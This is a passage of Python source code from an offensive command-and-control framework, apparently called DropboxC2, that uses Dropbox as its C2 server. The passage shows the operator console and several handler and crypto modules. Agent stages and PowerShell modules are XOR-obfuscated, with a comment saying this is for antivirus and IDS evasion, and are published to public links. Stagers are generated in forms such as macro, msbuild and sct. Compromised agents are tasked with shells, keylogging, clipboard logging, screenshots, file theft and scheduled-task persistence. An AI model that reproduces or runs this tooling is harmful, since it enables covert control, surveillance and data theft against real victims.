#------------------------------------------------------------------------------------ def do_publishStage(self, args): """publishStage [stage name]\nPublish an agent stage on the C2 server.\nAn optionnal name can be provided to distinguish between various published stages""" # Checking args if not args: print helpers.color("[!] Please specify a stage file. Command format: publishStage [stage name]") return arguments = args.split() agentStageFile = arguments[0] stageName = arguments[1] if len(arguments) > 1 else "default" agentPath = os.path.join(cfg.defaultPath['agentRelease'], agentStageFile) if not os.path.isfile(agentPath): print helpers.color("[!] Unable to find stage file [{}] in the default agent release PATH".format(agentPath)) return self.mainHandler.publishStage(agentPath, stageName) #------------------------------------------------------------------------------------ def complete_publishStage(self, text, line, startidx, endidx): agentReleasePath = cfg.defaultPath['agentRelease'] return [f for f in os.listdir(agentReleasePath) if os.path.isfile(os.path.join(agentReleasePath,f)) and f.startswith(text)] #------------------------------------------------------------------------------------ def do_deletePublishedStage(self, args): """deletePublishedStage \nDelete a published stage file from the C2 server""" # Checking args if not args: print helpers.color("[!] Please specify a stage name. Command format: deletePublishedStage ") return stageName = args.split()[0] if not stageName in self.statusHandler.publishedStageList: print helpers.color("[!] Please specify a valid stage name. You can use 'listPublishedStage' to see them") return r = raw_input(helpers.color("[?] Delete published stage [{}]? [Y/n] ".format(stageName))) if r.lower() in ['','y']: self.mainHandler.deletePublishedStage(stageName) #------------------------------------------------------------------------------------ def complete_deletePublishedStage(self, text, line, startidx, endidx): return [a for a in self.statusHandler.publishedStageList if a.startswith(text)] #------------------------------------------------------------------------------------ def do_publishModule(self, args): """publishModule \nPublish a PowerShell module the C2 server so it can later be used by an agent""" # Checking args if not args: print helpers.color("[!] Please specify a module file. Command format: publishModule ") return arguments = args.split() moduleFile = arguments[0] moduleName = os.path.splitext(moduleFile)[0] modulePath = os.path.join(cfg.defaultPath['modules'], moduleFile) if not os.path.isfile(modulePath): print helpers.color("[!] Unable to find module file [{}] in the default modules PATH".format(modulePath)) return self.mainHandler.publishModule(modulePath, moduleName) #------------------------------------------------------------------------------------ def complete_publishModule(self, text, line, startidx, endidx): modulePath = cfg.defaultPath['modules'] return [f for f in os.listdir(modulePath) if os.path.isfile(os.path.join(modulePath,f)) and f.startswith(text) and f.endswith(".ps1")] #------------------------------------------------------------------------------------ def do_deletePublishedModule(self, args): """deletePublishedModule \nDelete a published module file from the C2 server""" # Checking args if not args: print helpers.color("[!] Please specify a module name. Command format: deletePublishedModule ") return moduleName = args.split()[0] if not moduleName in self.statusHandler.publishedModuleList: print helpers.color("[!] Please specify a valid module name. You can use 'listPublishedModule' to see them") return r = raw_input(helpers.color("[?] Delete published module [{}]? [Y/n] ".format(moduleName))) if r.lower() in ['','y']: self.mainHandler.deletePublishedModule(moduleName) #------------------------------------------------------------------------------------ def complete_deletePublishedModule(self, text, line, startidx, endidx): return [moduleName for moduleName in self.statusHandler.publishedModuleList if moduleName.startswith(text)] #------------------------------------------------------------------------------------ def do_genStager(self, args): """genStager \nGenerates a stager of the selected type using a specific published stage name""" # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: genStager ") return arguments = args.split() if len(arguments) < 2: print helpers.color("[!] Missing arguments. Command format: genStager ") return stagerType = arguments[0] stageName = arguments[1] if stagerType not in ['oneliner', 'batch', 'batch2', 'macro', 'msbuild', 'javascript', 'javascript2', 'ducky', 'sct']: print helpers.color("[!] Invalid stager type") return if not self.statusHandler.isValidStage(stageName): print helpers.color("[!] Invalid stage: wrong name or no shared URL found") return self.mainHandler.genStager(stagerType, stageName) #------------------------------------------------------------------------------------ def complete_genStager(self, text, line, startidx, endidx): result = [] if startidx < 15: for stagerType in ['oneliner', 'batch', 'batch2', 'macro', 'msbuild', 'javascript', 'javascript2', 'ducky', 'sct']: if stagerType.startswith(text): result.append(stagerType) else: stageList = [a for a in self.statusHandler.publishedStageList] for stageName in stageList: if stageName.startswith(text): result.append(stageName) return result #------------------------------------------------------------------------------------ def do_genStager2(self, args): """genStager2 \nGenerates a stager itself based on a previously created stager using genStager""" # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: genStager2 ") return arguments = args.split() stagerType = arguments[0] stagerArguments = "" if stagerType not in ['macro_sct']: print helpers.color("[!] Invalid stager type") return if stagerType in ['macro_sct']: stagerArguments = raw_input("[{}] Please provide a URL serving the SCT stager file the macro will use: ".format(stagerType)) self.mainHandler.genStager2(stagerType, stagerArguments) #------------------------------------------------------------------------------------ def complete_genStager2(self, text, line, startidx, endidx): return [s for s in ['macro_sct'] if s.startswith(text)] #------------------------------------------------------------------------------------ def do_taskList(self, args): """Show the list of all pending tasks assigned to any agent""" helpers.printPendingTaskList(self.statusHandler.pendingTaskList) #------------------------------------------------------------------------------------ def do_exit(self, args): """Exit the program""" raise KeyboardInterrupt return True #------------------------------------------------------------------------------------ def do_help(self, args): """Show the help menu""" cmd.Cmd.do_help(self, args) #------------------------------------------------------------------------------------ def emptyline(self): pass #------------------------------------------------------------------------------------ def default(self, line): print (">>> Unknown command. Type 'help' or '?' to get a list of available commands.") #**************************************************************************************** # Class handling console agent menu interactions #**************************************************************************************** class AgentMenu(cmd.Cmd): #------------------------------------------------------------------------------------ def __init__(self, agentHandler, statusHandler): cmd.Cmd.__init__(self) self.agentHandler = agentHandler self.statusHandler = statusHandler self.prompt = "[{:.10}]#> ".format(self.agentHandler.agentID) #------------------------------------------------------------------------------------ def do_back(self, args): """Go back to the main menu""" return True #------------------------------------------------------------------------------------ def do_use(self, args): """use \nSelect the current agent to work with. Must be an ACTIVE or SLEEPING agent""" # Validate arguments: should be an valid agentID if not args: print helpers.color("[!] Please specify an agent ID. Command format: use ") return agentID = args.split()[0] if self.statusHandler.agentIsKnown(agentID): if self.statusHandler.agentIsDead(agentID): print helpers.color("[!] Cannot use a 'DEAD' agent. Check for ALIVE or SLEEPING agent using the 'list' command") return print helpers.color("[*] Using agent ID [{}]".format(agentID)) self.agentHandler.agentID = agentID self.prompt = "[{:.10}]#> ".format(agentID) else: print helpers.color("[!]Unkown agent ID [{}]".format(agentID)) #------------------------------------------------------------------------------------ def complete_use(self, text, line, startidx, endidx): return [agentID for agentID in self.statusHandler.agentList if self.statusHandler.agentIsAlive(agentID) and agentID.startswith(text)] #------------------------------------------------------------------------------------ def do_list(self, args): """Show the list of all discovered agents with their current status""" helpers.printAgentList(self.statusHandler.agentList) #------------------------------------------------------------------------------------ def do_taskList(self, args): """Show the list of all pending tasks assigned to the current agent""" helpers.printPendingTaskList(self.statusHandler.pendingTaskList, self.agentHandler.agentID) #------------------------------------------------------------------------------------ def do_cmd(self, args): """Switches to the CLI command mode to task current agent with some CLI commands (cmd.exe)""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return userCmd = raw_input("Command: ") if userCmd: self.agentHandler.taskAgentWithCLI(userCmd) #------------------------------------------------------------------------------------ def do_shell(self, args): """Switches to an interactive shell on the agent side. The shell process is not killed until you 'exit' it""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Shorten the polling period for a more interactive and fast experience self.statusHandler.pollingPeriod = 2 print helpers.color("[*] Temporarily change polling period to 2 seconds for a faster interaction") print helpers.color("[*] Entering interactive shell. Environment is persistent between commands and child process is not killed until you exit it") userCmd = "" while userCmd != "exit": userCmd = raw_input("PS> ") if userCmd: if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") else: self.agentHandler.taskAgentWithShell(userCmd) # Restore the default polling period print helpers.color("[*] Restoring default polling period") self.statusHandler.pollingPeriod = cfg.defaultPollingPeriod #------------------------------------------------------------------------------------ def do_launchProcess(self, args): """launchProcess [arguments]\nInstruct the agent to launch a process in the background, with the given executable name and the optionnal arguments""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: launchProcess [arguments]") return try: arguments = helpers.retrieveQuotedArgs(args,2) except ValueError as e: print helpers.color("[!] Wrong arguments format: {}".format(e)) return # Path normalization for Windows exePath = arguments[0].replace("/","\\") parameters = arguments[1] if len(arguments) > 1 else " " self.agentHandler.taskAgentWithLaunchProcess(exePath, parameters) #------------------------------------------------------------------------------------ def do_runPSModule(self, args): """runPSModule [arguments]\nLoads a *published* PowerShell module with optionnal arguments, and optionnaly get a CLI to interact with it""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: runPSModule [arguments]") return # Retrieve arguments arguments = args.split(' ',1) moduleName = arguments[0] moduleArgs = arguments[1] if len(arguments) > 1 else None # Check if the module is valid and published if not self.statusHandler.isValidModule(moduleName): print helpers.color("[!] Please specify a valid module. You can use 'listPublishedModule' to see them") return # Ask the user if he wants an interactive shell with the module loaded r = raw_input(helpers.color("[?] Once module loaded, do you want to get a powershell CLI to interact with it (y/N)?")) if r.lower() == "y": self.agentHandler.taskAgentWithRunPSModule(moduleName, moduleArgs, True) print helpers.color("[*] Please wait while the module is being loaded and a shell returned...") userCmd = "" while userCmd != "exit": userCmd = raw_input("PS> ") if userCmd: if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") else: self.agentHandler.taskAgentWithShell(userCmd) else: self.agentHandler.taskAgentWithRunPSModule(moduleName, moduleArgs) #------------------------------------------------------------------------------------ def complete_runPSModule(self, text, line, startidx, endidx): return [moduleName for moduleName in self.statusHandler.publishedModuleList if moduleName.startswith(text)] #------------------------------------------------------------------------------------ def do_sleep(self, args): """sleep \nInstruct the current agent to sleep for a given amount of time. Amount of time is a combination of days, hours and minutes:\nsleep [0-infinite]d[0-23]h[0-59]m\nExample:\nsleep 1d12h45m""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked (either because it's DEAD or already tasked with something)") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: sleep ") return try: days = args[0:args.index('d')] hours = args[args.index('d')+1:args.index('h')] minutes = args[args.index('h')+1:args.index('m')] except ValueError: print helpers.color("[!] Wrong format for 'amount of time'. Must be a combination of days, hours and minutes:\nsleep [0-infinite]d[0-23]h[1-59]m\nExample: sleep 1d12h45m") return if not helpers.stringIsInt(days) or not helpers.stringIsInt(hours) or not helpers.stringIsInt(minutes): print helpers.color("[!] Wrong format for 'amount of time'. Must be a combination of days, hours and minutes:\nsleep [0-infinite]d[0-23]h[1-59]m\nExample: sleep 1d12h45m") return sleepTime = int(days)*86400 + int(hours)*60 + int(minutes) if sleepTime == 0: print helpers.color("[!] Wrong 'amount of time': Agent cannot sleep for 0 minute, must be at least 1 minute") else: self.agentHandler.taskAgentWithSleep(sleepTime) #------------------------------------------------------------------------------------ def do_polling(self, args): """polling [deviation]\nSet the current agent polling period (seconds), with an optionnal deviation (percentage) between 10 and 50""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked (either because it's DEAD or already tasked with something)") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: polling [deviation]") return try: arguments = helpers.retrieveQuotedArgs(args,2) except ValueError as e: print helpers.color("[!] Wrong arguments format: {}".format(e)) return try: period = int(arguments[0]) deviation = int(arguments[1]) if len(arguments) > 1 else 50 except ValueError: print helpers.color("[!] Arguments must be proper integers") return if period < 0: print helpers.color("[!] Period cannot be a negative number") return if deviation not in range(10,51): print helpers.color("[!] Deviation can only be between 10 and 50%") return self.agentHandler.taskAgentWithNewPolling(period, deviation) #------------------------------------------------------------------------------------ def do_sendFile(self, args): """sendFile [destination directory]\nSend a local file to the current agent. If no destination directory is provided, %TEMP% is used""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked (either because it's DEAD or already tasked with something)") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: sendFile [destination path]") return try: arguments = helpers.retrieveQuotedArgs(args,2) except ValueError as e: print helpers.color("[!] Wrong arguments format: {}".format(e)) return localFile = arguments[0] # Path normalization for Windows if len(arguments) > 1: # Add a trailing backslash if missing and replace forward slashes to backslashes destinationPath = arguments[1].replace("/","\\") + "\\" if arguments[1][-1] != "\\" else arguments[1].replace("/","\\") else: destinationPath = "temp" if os.path.isfile(localFile): self.agentHandler.taskAgentWithSendFile(localFile, destinationPath) else: print helpers.color("[!] Unable to find local file [{}] in the default PATH".format(localFile)) #------------------------------------------------------------------------------------ def complete_sendFile(self, text, line, startidx, endidx): result = [] for f in os.listdir('.'): if os.path.isfile(f) and f.startswith(text): if f.count(' ') > 0: result.append('"' + f + '"') else: result.append(f) return result #------------------------------------------------------------------------------------ def do_getFile(self, args): """getFile \nDownload a file from the agent to the local system""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: getFile ") return try: arguments = helpers.retrieveQuotedArgs(args,1) except ValueError as e: print helpers.color("[!] Wrong arguments format: {}".format(e)) return # Path normalization for Windows filePath = arguments[0].replace("/","\\") self.agentHandler.taskAgentWithGetFile(filePath) #------------------------------------------------------------------------------------ def do_screenshot(self, args): """screenshot\nTake a screenshot of the agent screen, in JPG format, and download it""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return self.agentHandler.taskAgentWithScreenshot() #------------------------------------------------------------------------------------ def do_keylogger(self, args): """keylogger \nStart or stops a keylogger""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: keylogger ") return # Retrieve arguments if args not in ['start', 'stop']: print helpers.color("[!] Invalid arguments. Command format: keylogger ") return self.agentHandler.taskAgentWithKeylogger(args) #------------------------------------------------------------------------------------ def complete_keylogger(self, text, line, startidx, endidx): return [a for a in ['start', 'stop'] if a.startswith(text)] #------------------------------------------------------------------------------------ def do_clipboardLogger(self, args): """clipboardLogger \nStart or stops a clipboard logger""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: clipboardLogger ") return # Retrieve arguments if args not in ['start', 'stop']: print helpers.color("[!] Invalid arguments. Command format: keylogger ") return self.agentHandler.taskAgentWithClipboardLogger(args) #------------------------------------------------------------------------------------ def complete_clipboardLogger(self, text, line, startidx, endidx): return [a for a in ['start', 'stop'] if a.startswith(text)] #------------------------------------------------------------------------------------ def do_sendKeystrokes(self, args): """sendKeystrokes \nSend specified key strokes to the process identified by its name.\nRef: https://msdn.microsoft.com/en-us/library/aa266279(v=vs.60).aspx""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked (either because it's DEAD or already tasked with something)") return # Checking args if not args: print helpers.color("[!] Missing arguments. Command format: sendKeystrokes ") return arguments = args.split(' ',1) if len(arguments) < 2: print helpers.color("[!] Missing arguments. Command format: sendKeystrokes ") return procName = arguments[0] keyStrokes = arguments[1] self.agentHandler.taskAgentWithSendKeystrokes(procName, keyStrokes) #------------------------------------------------------------------------------------ def do_stop(self, args): """stop\nStop the current agent""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return confirmation = raw_input(helpers.color("[!] Ask remote agent to stop itself? Are you sure? (y/N) ")) if confirmation.lower() == 'y': self.agentHandler.taskAgentWithStop() #------------------------------------------------------------------------------------ def do_persist(self, args): """persist\nEnable agent persistency by the means of a scheduled task""" if not self.statusHandler.agentCanBeTasked(self.agentHandler.agentID): print helpers.color("[!] Agent can't be tasked, either because it's DEAD or already tasked with something") return confirmation = raw_input(helpers.color("[!] Set agent persistency? Are you sure? (y/N) ")) if confirmation.lower() == 'y': self.agentHandler.taskAgentWithPersist() #------------------------------------------------------------------------------------ def complete_persist(self, text, line, startidx, endidx): return [a for a in self.statusHandler.publishedStageList if a.startswith(text)] #------------------------------------------------------------------------------------ def do_exit(self, args): """Exit the program""" raise KeyboardInterrupt return True #------------------------------------------------------------------------------------ def do_help(self, args): """Show the help menu""" cmd.Cmd.do_help(self, args) #------------------------------------------------------------------------------------ def emptyline(self): pass ================================================ FILE: lib/crypto.py ================================================ # -*- coding: utf8 -*- from Crypto.Cipher import AES from Crypto.Hash import SHA256 from os import urandom import base64 #**************************************************************************************** # Class providing AES-128 CBC with PKCS7 padding cryptographic operations #**************************************************************************************** class Crypto(object): #----------------------------------------------------------- @classmethod def createKey(cls, outputFormat = "raw"): if outputFormat == "raw": return urandom(16) # 128bits AES is an agreed trade off between security and performances else: return base64.b64encode(urandom(16)) #----------------------------------------------------------- @classmethod def encryptData(cls, clearText, key): """Encrypts data with the provided key. The returned byte array is as follow: :==============:==================================================: : IV (16bytes) : Encrypted (data + PKCS7 padding information) : :==============:==================================================: """ # Generate a crypto secure random Initialization Vector iv = urandom(AES.block_size) # Perform PKCS7 padding so that clearText is a multiple of the block size clearText = cls.pad(clearText) cipher = AES.new(key, AES.MODE_CBC, iv) return iv + cipher.encrypt(clearText) #----------------------------------------------------------- @classmethod def decryptData(cls, cipherText, key): """Decrypt data with the provided key""" # Initialization Vector is in the first 16 bytes iv = cipherText[:AES.block_size] cipher = AES.new(key, AES.MODE_CBC, iv) return cls.unpad(cipher.decrypt(cipherText[AES.block_size:])) #------------------------------------------------------------------------ @classmethod def xor(cls, data, key): l = len(key) keyAsInt = map(ord, key) return bytes(bytearray(( (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data)) ))) #------------------------------------------------------------------------ @classmethod def convertKey(cls, key, outputFormat = "raw"): if outputFormat == "raw": return base64.b64decode(key) elif outputFormat == "sha256": return SHA256.new(key).hexdigest() else: return base64.b64encode(key) #------------------------------------------------------------------------ @classmethod def pad(cls, s): """PKCS7 padding""" return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) #------------------------------------------------------------------------ @classmethod def unpad(cls, s): """PKCS7 padding removal""" return s[:-ord(s[len(s)-1:])] ================================================ FILE: lib/dropboxHandler.py ================================================ # -*- coding: utf8 -*- import requests from lib import helpers #**************************************************************************************** # Class handling raw HTTP communications with the Dropbox server #**************************************************************************************** class DropboxHandler: """ This class provides wrapping methods for raw HTTP communications with the Dropbox server """ #----------------------------------------------------------- def __init__(self, token): self.token = token self.authorization = "Bearer " + token self.dropboxAPI = { 'listFolder': 'https://api.dropboxapi.com/2/files/list_folder', 'uploadFile': 'https://content.dropboxapi.com/2/files/upload', 'downloadFile': 'https://content.dropboxapi.com/2/files/download', 'deleteFile': 'https://api.dropboxapi.com/2/files/delete', 'getMetaData': 'https://api.dropboxapi.com/2/files/get_metadata', 'shareFile': 'https://api.dropboxapi.com/2/sharing/create_shared_link_with_settings', 'getSharedLink': 'https://api.dropboxapi.com/2/sharing/list_shared_links' } #----------------------------------------------------------- def sendRequest(self, url, headers, data = None, resultFormat = "text"): try: headers['Authorization'] = self.authorization # Perform the request r = requests.post(url,headers=headers,data=data) if r.status_code != requests.codes.ok: print helpers.color("[!]Wrong HTTP status code received") print helpers.color(r.text,"red") return None if resultFormat == "text": return r.text elif resultFormat == "json": return r.json() else: return r.content except requests.RequestException as e: print helpers.color("[!]Error communicating with the Dropbox server") print helpers.color(e,"red") return None except ValueError as e: print helpers.color("[!]Error decoding JSON response") print helpers.color(e,"red") return None #----------------------------------------------------------- def deleteFile(self, path): # Set required headers headers = { 'Content-Type': 'application/json' } data = '{"path": "' + path + '"}' return self.sendRequest(self.dropboxAPI['deleteFile'], headers, data) #----------------------------------------------------------- def listFolder(self, path, resultFormat = "json"): # Set required headers headers = { 'Content-Type': 'application/json' } data = "{\"path\": \"" + path +"\",\"recursive\": false,\"include_media_info\": false,\"include_deleted\": false,\"include_has_explicit_shared_members\": false}" return self.sendRequest(self.dropboxAPI['listFolder'], headers, data, resultFormat=resultFormat) #----------------------------------------------------------- def readFile(self, path, resultFormat = "text"): # Set required headers headers = { 'Dropbox-API-Arg': '{"path": "' + path + '"}' } return self.sendRequest(self.dropboxAPI['downloadFile'], headers, resultFormat=resultFormat) #----------------------------------------------------------- def putFile(self, path, data): # Set required headers headers = { 'Content-Type': 'application/octet-stream', 'Dropbox-API-Arg': '{"path": "' + path + '","mode": "overwrite","autorename": false,"mute": true}' } return self.sendRequest(self.dropboxAPI['uploadFile'], headers, data) #----------------------------------------------------------- def getMetaData(self, path): # Set required headers headers = { 'Content-Type': 'application/json' } # Prepare request body data = '{"path": "' + path + '","include_media_info": false,"include_deleted": false,"include_has_explicit_shared_members": false}' return self.sendRequest(self.dropboxAPI['getMetaData'], headers, data) #----------------------------------------------------------- def shareFile(self, path): # Set required headers headers = { 'Content-Type': 'application/json' } # Prepare request body data = '{"path": "' + path + '", "settings": { "requested_visibility": "public"}}' return self.sendRequest(self.dropboxAPI['shareFile'], headers, data, resultFormat = "json") #----------------------------------------------------------- def getSharedLink(self, path): # Set required headers headers = { 'Content-Type': 'application/json' } # Prepare request body data = '{"path": "' + path + '"}' return self.sendRequest(self.dropboxAPI['getSharedLink'], headers, data, resultFormat = "json") ================================================ FILE: lib/helpers.py ================================================ # -*- coding: utf8 -*- """ Miscelaneous helper functions used in DropboxC2 """ import string import base64 import shlex from Crypto.Random import random from tabulate import tabulate from string import Template #------------------------------------------------------------------------ def printAgentList(agentList): table = [] table.append(["Agent ID", "Status", "Last Beacon (UTC)", "Wake Up time (UTC)"]) for agentID, agentInfo in agentList.items(): line = [] line.append(agentID) line.append(agentInfo['status']) line.append(agentInfo['lastBeacon']) line.append(agentInfo['wakeUpTime']) table.append(line) print "" print tabulate(table, headers="firstrow") print "" #------------------------------------------------------------------------ def printStageList(stageList): table = [] table.append(["Stage name", "Public link"]) for stageName, stageLink in stageList.items(): line = [] line.append(stageName) line.append(stageLink) table.append(line) print "" print tabulate(table, headers="firstrow") print "" #------------------------------------------------------------------------ def printModuleList(moduleList): table = [] table.append(["Module name", "Public link"]) for moduleName, moduleLink in moduleList.items(): line = [] line.append(moduleName) line.append(moduleLink) table.append(line) print "" print tabulate(table, headers="firstrow") print "" #------------------------------------------------------------------------ def printPendingTaskList(pendingTaskList, agentID = 0): if not pendingTaskList: print color("[*]Task list is empty...") return table = [] table.append(["Agent ID", "Task ID", "Command", "Arguments"]) for task in pendingTaskList: if task['agentID'] == agentID or agentID == 0: line = [] line.append(task['agentID']) line.append(task['id']) line.append(task['cmd']) line.append(" ".join(task['args'])) table.append(line) print "" print tabulate(table, headers="firstrow") print "" #------------------------------------------------------------------------ def b64encode(data): return base64.b64encode(data) def b64decode(data): return base64.b64decode(data) #------------------------------------------------------------------------ def randomString(length = -1, charset = string.ascii_letters): """ Author: HarmJ0y, borrowed from Empire Returns a random string of "length" characters. If no length is specified, resulting string is in between 6 and 15 characters. A character set can be specified, defaulting to just alpha letters. """ if length == -1: length = random.randrange(6,16) random_string = ''.join(random.choice(charset) for x in range(length)) return random_string #------------------------------------------------------------------------ def randomInt(minimum, maximum): """ Returns a random integer between or equald to minimum and maximum """ if minimum < 0: minimum = 0 if maximum < 0: maximum = 100 return random.randint(minimum, maximum) #------------------------------------------------------------------------ def chunks(s, n): """ Author: HarmJ0y, borrowed from Empire Generator to split a string s into chunks of size n. """ for i in xrange(0, len(s), n): yield s[i:i+n] #------------------------------------------------------------------------ def stringIsInt(s): try: int(s) return True except ValueError: return False #------------------------------------------------------------------------ def powershellEncode(rawData): """ Author: HarmJ0y, borrowed from Empire Encode a PowerShell command into a form usable by powershell.exe -enc ... """ return base64.b64encode("".join([char + "\x00" for char in unicode(rawData)])) #------------------------------------------------------------------------ def convertFromTemplate(parameters, templateFile): try: with open(templateFile) as f: src = Template(f.read()) result = src.substitute(parameters) f.close() return result except IOError: print helpers.color("[!] Could not open or read template file [{}]".format(templateFile)) return None #------------------------------------------------------------------------ def retrieveQuotedArgs(args, maxNbArgs): """Parses arguments that may contain double quote for escaping spaces in arguments""" nbArgs = 0 result = [] # Remove trailing and starting spaces args = args.strip() temp = shlex.split(args) if len(temp) <= maxNbArgs: return temp else: result = temp[:maxNbArgs-1] result.append(' '.join(temp[maxNbArgs-1:len(temp)])) return result #------------------------------------------------------------------------ def color(string, color=None): """ Author: HarmJ0y, borrowed from Empire Change text color for the Linux terminal. """ attr = [] # bold attr.append('1') if color: if color.lower() == "red": attr.append('31') elif color.lower() == "green": attr.append('32') elif color.lower() == "blue": attr.append('34') return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) else: if string.strip().startswith("[!]"): attr.append('31') return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) elif string.strip().startswith("[+]"): attr.append('32') return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) elif string.strip().startswith("[?]"): attr.append('33') return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) elif string.strip().startswith("[*]"): attr.append('34') return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string) else: return string #------------------------------------------------------------------------ def printBanner(): print color(""" ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗██████╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝╚════██╗ ██║ ██║██████╔╝██║ ██║██████╔╝██████╔╝██║ ██║ ╚███╔╝ ██║ █████╔╝ ██║ ██║██╔══██╗██║ ██║██╔═══╝ ██╔══██╗██║ ██║ ██╔██╗ ██║ ██╔═══╝ ██████╔╝██║ ██║╚██████╔╝██║ ██████╔╝╚██████╔╝██╔╝ ██╗╚██████╗███████╗ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ """, "blue") ================================================ FILE: lib/mainHandler.py ================================================ # -*- coding: utf8 -*- import config as cfg from lib import helpers from lib import stagers from lib.crypto import Crypto #**************************************************************************************** # Class handling main menu commands and interactions #**************************************************************************************** class MainHandler: """ This class provides all functions used in the main menu """ #------------------------------------------------------------------------------------ def __init__(self, dropboxHandler, statusHandler): self.dropboxHandler = dropboxHandler self.statusHandler = statusHandler #------------------------------------------------------------------------------------ def publishStage(self, stageLocalPath, stageName): print helpers.color("[*] Publishing [{}] to the C2 server".format(stageLocalPath)) remoteFilePath = "/" + stageName + ".aa" # Get a SHA256 hash value of the master key # (!!) : Because we use XOR for obfuscating the stage (not proper encryption, just for IDS / AV evasion), # it would not be wise to use the master key that is also used for end-to-end data encryption xorKey = Crypto.convertKey(self.statusHandler.masterKey, outputFormat = "sha256") # XOR Encrypt the agent stage file and then upload it to the C2 server try: with open(stageLocalPath) as agentFileHandle: r = self.dropboxHandler.putFile(remoteFilePath, Crypto.xor(bytearray(agentFileHandle.read()), xorKey)) agentFileHandle.close() if r is None: return else: print helpers.color("[*] Agent stage XOR encrypted with key [{}] and successfully published".format(xorKey)) except IOError: print helpers.color("[!] Could not open or read file [{}]".format(stageLocalPath)) return # Share the file with a public URL and retrieve the URL r = self.dropboxHandler.shareFile(remoteFilePath) if r is None: return # Get the public URL from the answer try: stageURL = r['url'].replace("dl=0","dl=1") self.statusHandler.addStage(stageName, stageURL) print helpers.color("[*] Stage successfully shared with public URL [{}]".format(stageURL)) except KeyError: print helpers.color("[!] Error parsing JSON looking for 'url' entry") print helpers.color("[!] Stage has NOT been shared as a public URL") #------------------------------------------------------------------------------------ def deletePublishedStage(self, stageName): stageFileName = "/" + stageName + ".aa" if self.dropboxHandler.deleteFile(stageFileName) is not None: self.statusHandler.removeStage(stageName) print helpers.color("[*] Published stage [{}] has been successfully deleted from C2 server".format(stageName)) else: print helpers.color("[!] Error deleting published stage [{}] from C2 server".format(stageName)) #------------------------------------------------------------------------------------ def publishModule(self, moduleLocalPath, moduleName): print helpers.color("[*] Publishing [{}] to the C2 server".format(moduleLocalPath)) remoteFilePath = "/" + moduleName + ".mm" # Get a SHA256 hash value of the master key # (!!) : Because we use XOR for obfuscating the stage (not proper encryption, just for IDS / AV evasion), # it would not be wise to use the master key that is also used for end-to-end data encryption xorKey = Crypto.convertKey(self.statusHandler.masterKey, outputFormat = "sha256") # XOR Encrypt the module and then upload it to the C2 server try: with open(moduleLocalPath) as moduleFileHandle: r = self.dropboxHandler.putFile(remoteFilePath, Crypto.xor(bytearray(moduleFileHandle.read()), xorKey)) moduleFileHandle.close() if r is None: return else: print helpers.color("[*] Module XOR encrypted with key [{}] and successfully published".format(xorKey)) except IOError: print helpers.color("[!] Could not open or read file [{}]".format(moduleLocalPath)) return # Share the file with a public URL and retrieve the URL r = self.dropboxHandler.shareFile(remoteFilePath) if r is None: return # Get the public URL from the answer try: moduleURL = r['url'].replace("dl=0","dl=1") self.statusHandler.addModule(moduleName, moduleURL) print helpers.color("[*] Module successfully shared with public URL [{}]".format(moduleURL)) except KeyError: print helpers.color("[!] Error parsing JSON looking for 'url' entry") print helpers.color("[!] Stage has NOT been shared as a public URL") #------------------------------------------------------------------------------------ def deletePublishedModule(self, moduleName): moduleFileName = "/" + moduleName + ".mm" if self.dropboxHandler.deleteFile(moduleFileName) is not None: self.statusHandler.removeModule(moduleName) print helpers.color("[*] Published module [{}] has been successfully deleted from C2 server".format(moduleName)) else: print helpers.color("[!] Error deleting published module [{}] from C2 